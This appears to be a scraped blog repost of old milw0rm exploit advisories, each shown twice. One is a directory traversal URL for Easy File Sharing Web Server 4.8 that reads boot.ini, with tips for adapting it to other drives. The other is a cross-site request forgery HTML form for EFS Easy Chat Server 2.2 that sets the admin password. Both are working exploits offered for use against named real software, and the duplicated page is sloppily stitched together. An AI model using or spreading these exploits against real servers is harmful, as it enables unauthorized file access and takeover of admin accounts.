Found by Mountassif Moad
www.v4-team.com
-- Bug --
Exploit :
http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini if you have a hard disk like d or f you change disk_c by disk_d or disk_f some host dont have this and if dont work in first test try to register and test another time. Tested on win xp SP 2 fr
# milw0rm
Program: Easy File Sharing Web Server
Version: 4.8
Download: http://www.sharing-file.com/efssetup.exe
Found by Mountassif Moad
www.v4-team.com
-- Bug --
Exploit :
http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini if you have a hard disk like d or f you change disk_c by disk_d or disk_f some host dont have this and if dont work in first test try to register and test another time. Tested on win xp SP 2 fr
# milw0rm
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
HTML
!--
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
Version: 2.2
Date: Jan 11, 2007
Size:1519KB
Download Easy Chat Server http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
-->
HEAD
TITLE EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability /TITLE
SCRIPT LANGUAGE="JavaScript"
/SCRIPT
/HEAD
BODY bgcolor="#008000" LANGUAGE="JavaScript"
div align=center
TABLE border="2" width="250"
FORM action="http://127.0.0.1/registresult.htm" method="POST" name="regist" onsubmit="return check();"
TR
TD align="center" class="title" font color=red>Booom!!/font /TD
/TR
TR
TD Username:
INPUT type="text" name="UserName" maxlength="30" value="admin" *
/TD /TR
TR TD
Password: INPUT type="password" name="Password" maxlength="30" value="stack" *
/TD /TR
TR
TD Confirm Password:
INPUT type="password" name="Password1" maxlength="30" value="stack" *
/TD /TR>
TR
/TD /TR
TR TD
Email: INPUT type="text" name="Email" value="admin@127.0.0.1.com" maxlength="30"
/TD /TR
TR TD
/TD /TR
TR TD
BR
TEXTAREA rows="4" cols="30" name="Resume"chi le3ba /TEXTAREA
/TD /TR
TR TD align="center"
INPUT type="submit" value="Click here to test" name=submit1
INPUT type="button" value="Close" name=button1 onclick="window.close();"
/TD /TR
/form /TABLE
/div
script language="JavaScript"
/script
/BODY
/HTML
# milw0rm
!--
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
Version: 2.2
Date: Jan 11, 2007
Size:1519KB
Download Easy Chat Server http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
-->
HEAD
TITLE EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability /TITLE
SCRIPT LANGUAGE="JavaScript"
/SCRIPT
/HEAD
BODY bgcolor="#008000" LANGUAGE="JavaScript"
div align=center
TABLE border="2" width="250"
FORM action="http://127.0.0.1/registresult.htm" method="POST" name="regist" onsubmit="return check();"
TR
TD align="center" class="title" font color=red>Booom!!/font /TD
/TR
TR
TD Username:
INPUT type="text" name="UserName" maxlength="30" value="admin" *
/TD /TR
TR TD
Password: INPUT type="password" name="Password" maxlength="30" value="stack" *
/TD /TR
TR
TD Confirm Password:
INPUT type="password" name="Password1" maxlength="30" value="stack" *
/TD /TR>
TR
/TD /TR
TR TD
Email: INPUT type="text" name="Email" value="admin@127.0.0.1.com" maxlength="30"
/TD /TR
TR TD
/TD /TR
TR TD
BR
TEXTAREA rows="4" cols="30" name="Resume"chi le3ba /TEXTAREA
/TD /TR
TR TD align="center"
INPUT type="submit" value="Click here to test" name=submit1
INPUT type="button" value="Close" name=button1 onclick="window.close();"
/TD /TR
/form /TABLE
/div
script language="JavaScript"
/script
/BODY
/HTML
# milw0rm
Subscribe to:
Posts (Atom)
Posts
